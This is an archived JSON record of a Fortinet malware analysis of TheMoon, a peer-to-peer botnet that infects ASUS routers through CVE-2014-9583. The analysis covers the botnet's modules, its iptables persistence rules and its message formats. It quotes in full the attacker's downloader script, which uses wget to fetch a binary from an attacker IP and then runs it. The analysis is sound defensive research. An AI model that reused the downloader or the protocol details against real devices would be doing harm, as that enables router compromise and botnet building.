{
	"id": "ce009743-684b-4d6e-8b14-09229a21b9c2",
	"created_at": "2026-04-06T00:14:09.623471Z",
	"updated_at": "2026-04-10T13:11:57.748247Z",
	"deleted_at": null,
	"sha1_hash": "064cae9707f1e2a539e2dc802818cc83e07c9a98",
	"title": "TheMoon - A P2P botnet targeting Home Routers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 260185,
	"plain_text": "TheMoon - A P2P botnet targeting Home Routers\r\nBy Bing Liu\r\nPublished: 2016-10-20 · Archived: 2026-04-02 11:36:36 UTC\r\nIn the post “Home Routers - New Favorite of Cybercriminals in 2016”, we discussed the active detection of\r\nvulnerability CVE-2014-9583 in ASUS routers since June of this year.  In this post we will dissect a bot installed\r\non the affected ASUS routers.\r\nThe following figure shows attack traffic captured through Wireshark.\r\nFigure 1 Exploitation of CVE-2014-9583\r\nBelow is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/.\r\n#!/bin/sh\r\ncd /tmp\r\nrm -f .nttpd\r\nwget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1\r\nchmod +x .nttpd\r\n./.nttpd\r\nhttps://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nPage 1 of 10\n\nThe vulnerable ASUS router will  download and execute the binary file .nttpd from the attacker controlled\r\nwebsite.  The following figure shows its MD5 hash and file attributes:\r\nFigure 2 md5sum and file attributes\r\nA simple search shows that this bot was analyzed here.  
However, that analysis was based on sample MD5:\r\nc44f2d8ad37c18ea84a99db584d6992d, and some parts are misleading, so we want to share our updated findings\r\nin this post.\r\nThis bot belongs to the TheMoon family of malware, which shares the following program structure.\r\nFigure 3 Program structure of TheMoon family\r\nThe differences between the family members are mainly located in the functions os_init and run_modules.\r\nThis bot inserts the following eight iptables rules in the function os_init.\r\nFigure 3 iptables rules\r\nThe first rule stops other attackers from exploiting the ASUS vulnerability CVE-2014-9583, while the second one\r\nstops other attackers from exploiting the Linksys Unauthenticated Remote Code Execution vulnerability.\r\nAll the rest ensure that the attacker keeps access to this router. We will talk about hard-coded peers later in this post.\r\nIn the function run_modules, this bot launches three modules: “clk,” “net” and “dwl.” Let’s analyze them one by\r\none.\r\nClk Module\r\nThis module launches two threads. The first one calculates the running time while the second one maintains the\r\ntime. This bot queries public NTP servers for the UTC time, as shown in the following figure.\r\nFigure 4 Hard-coded NTP servers\r\nThe following figure shows an NTP request sent by this bot, and the response from the public NTP server.\r\nFigure 5 NTP request and response\r\nWe don’t believe that these hard-coded IP addresses are C\u0026C servers, as was claimed here.\r\nIf the NTP query fails, the bot will instead use the local time.\r\nNet Module\r\nThis module adds an iptables rule to open UDP port 5143, and then creates a thread which is responsible for P2P\r\ncommunication.
It is worth mentioning that the supported message types are variant-specific, and usually\r\ndifferent port numbers are used for communication.\r\nThis bot supports the following three types of message.\r\n1. Register message\r\n2. RegisterTo message\r\n3. FetchCommand message\r\nEvery message contains a header and a body. All these messages share the following header structure:\r\nOffset  Size  Description\r\n0       1     Body length\r\n1       1     Message Type\r\n2       1     TTL\r\n3       1     0x8F (variant specific)\r\nFor every received message, the bot decreases the TTL by one, and forwards the message to its peers if\r\nthe result is not zero. The following figure demonstrates this behavior.\r\nFigure 6 Forwarded message to its peers\r\n1. Register message\r\nThe type value of this message is 0. The bot sends this message to the hard-coded peers after launching the three modules\r\nsuccessfully.\r\nFigure 7 register to hard-coded peers\r\nAs you may remember, iptables rules are installed to allow access to these hard-coded peers. The following figure\r\nshows the traffic sent to the hard-coded peers:\r\nFigure 8 Register message\r\nThe message body is comprised of two double words: the first one is 0x6d6163f4 (variant specific) and the\r\nsecond is the property value of this peer. The bot adds the sender as its peer after receiving this message. This bot\r\nsupports 0x64 peers at maximum.\r\n2. RegisterTo\r\nThe type value of this message is zero as well, but the message body is 12 bytes long.
If the third double word is\r\nnot zero, this bot sends a register message to the IP address specified in that word. Otherwise, it sends the register message to the sender.\r\nThe following figure shows a RegisterTo message received by the bot.\r\nFigure 9 RegisterTo message\r\n3. FetchCommand\r\nThe type value of this message is one. The following is the structure of the message body.\r\nOffset  Size  Description\r\n0       4     Peer IP address\r\n4       4     Command id\r\n8       4     Command size (Maximum 0x19001)\r\n12      n     File name (n\u003c=8)\r\nThe following figure shows a FetchCommand message received by this bot.\r\nFigure 10 FetchCommand message\r\nIf the sender is its peer, the bot stores the message in the following structure for the dwl module:\r\nstruct PendingCommand\r\n{\r\nDWORD ip;           // peer IP address to fetch the command file from\r\nDWORD cmd_id;       // command id\r\nDWORD cmd_size;     // command size (maximum 0x19001)\r\nCHAR filename[8];   // file name, at most 8 bytes\r\n};\r\nDwl Module\r\nThis module creates a thread which is responsible for handling the PendingCommand information created by the\r\nnet module. This bot connects to TCP port 4543 of the designated IP and sends it the required file name and\r\ncommand id. The following figure shows the traffic captured through Wireshark:\r\nFigure 11 Command request\r\nThe designated IP is supposed to return the requested file. The bot stores the response in the specified file and\r\nexecutes it.
The following figure shows the sequence of calls that creates and executes the received file:\r\nFigure 12 download and execute command\r\nWhile we were unable to download a command file for analysis at the time of this post, based on the file names and\r\nsizes we monitored, they are most likely other members of the TheMoon family.\r\nConclusion\r\nThe TheMoon family was first discovered by SANS ISC in 2014. This family targets routers and installs malware\r\nby exploiting their vulnerabilities. Judging by its hard-coded iptables rules, this bot is used on ASUS and Linksys routers.\r\nWe also discovered that its P2P communication is not as mature as that of its peers on PCs. For example, instead of using\r\ndigital signing, the botmaster uses iptables rules to ensure that only he can command the bots. Unfortunately, or fortunately,\r\nthese rules can be bypassed. In addition, the communication is not encrypted, which makes analysis and\r\ndetection easier.\r\nFortinet released the following detections for this bot:\r\nAV: Linux/Agent.B!tr.bdr\r\nAppCtrl: TheMoon.Botnet\r\nSource: https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers"
	],
	"report_names": [
		"themoon-a-p2p-botnet-targeting-home-routers"
	],
	"threat_actors": [],
	"ts_created_at": 1775434449,
	"ts_updated_at": 1775826717,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/064cae9707f1e2a539e2dc802818cc83e07c9a98.pdf",
		"text": "https://archive.orkl.eu/064cae9707f1e2a539e2dc802818cc83e07c9a98.txt",
		"img": "https://archive.orkl.eu/064cae9707f1e2a539e2dc802818cc83e07c9a98.jpg"
	}
}